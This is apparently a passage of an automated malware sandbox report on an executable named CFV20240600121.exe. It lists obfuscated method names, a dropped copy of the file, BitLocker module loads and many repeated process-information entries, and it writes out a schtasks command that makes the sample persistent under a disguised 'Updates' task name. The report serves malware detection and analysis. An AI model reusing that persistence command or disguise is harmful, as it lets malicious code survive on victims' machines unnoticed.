            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, cPvKSbL63MQZmurUtZ.csHigh entropy of concatenated method names: 'RuDAWUsu0r', 'T3XAFuBn6x', 'k0sAjosAft', 'pySAefe8X2', 'EMCAZI9rOQ', 'Sw6AB5tm5A', 'OpHAPxKWWN', 'ixDALh6onY', 'RwmA2vbUdB', 'M5vAfVbPB1'
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, A086JuqkHgM0AKgA1Rg.csHigh entropy of concatenated method names: 'WC3Yc16FLT', 'FMyYRGsZk9', 'PeEYEeuots', 'TfFY79ZMRG', 'VGhYoZWbne', 'UPuYhnlZBY', 'SHZYnkbZfK', 'MvvYGdTP4E', 'CsmYlQrdkV', 'pxsY4J4lvJ'
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, rITaQNIppjHIGN5wLX.csHigh entropy of concatenated method names: 'zorXfxXv3R', 'iWuX5N8ruh', 'ToString', 'IvbXFooyFm', 'jOKXjnYRy6', 'NBGXelLUL4', 'JpdXZpHLTb', 'YHOXBbI1T0', 'BTPXPG7NLI', 'DoDXLVYOJj'
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, mN32LvabmXpXZxWsh7.csHigh entropy of concatenated method names: 'UOQqPTUORd', 'YKEqLO15QV', 'jNLqfa0i2E', 'hgaq5RFqVe', 'XpjquXtV3h', 'kP6qslewCE', 'khgoSnk2sBccMk9jLb', 'YPGr9WVdpN8jr3lc8I', 'aRuqq1S90B', 'unqqASLMNK'
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, K3hLP6rlewCE5KBKWX.csHigh entropy of concatenated method names: 'KjJBWRtwp8', 'fcfBjWgrSJ', 'PgiBZsiSkr', 'ojuBP0uXcf', 'nIQBL1LmkG', 'F1hZJM91AY', 'nGDZUGHhWD', 'DZ6ZOKmQVv', 'AonZSwRYX1', 'K7DZ0Z9GIn'
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, pXQelPlNLa0i2EegaR.csHigh entropy of concatenated method names: 'ASRe75lZsE', 'nY5ehTexdG', 'pDceGX5NFI', 'wvtelUZQZV', 'l6deutdvvh', 'EFaes7Iutd', 'UiNeXx7fjL', 'XLgeDC8sht', 'E80eYV5Y2D', 'Qgye9oI49G'
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, ouWeMMzRTqcDURfed2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pd7YwnqBAE', 'JGPYuFryfk', 'S3iYsHffjk', 'nkOYXyefiq', 'hPFYDg9XSo', 'KekYYP2f7v', 'I7TY9HyN5x'
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, nOMy4evii8BZVFqpjP.csHigh entropy of concatenated method names: 'dtJn1dqdpfDOHmhqJIT', 'Ou9ruxqAIpKEGus1uSY', 'l0SBD8w3sh', 'yvnBYPcalo', 'xcVB9VxdAm', 'xv1xoHqhKg3MjJSRNBC', 'PpeQXoq2SyC69ePMpZ5'
            Source: C:\Users\user\Desktop\CFV20240600121.exeFile created: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmpA2C.tmp"

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
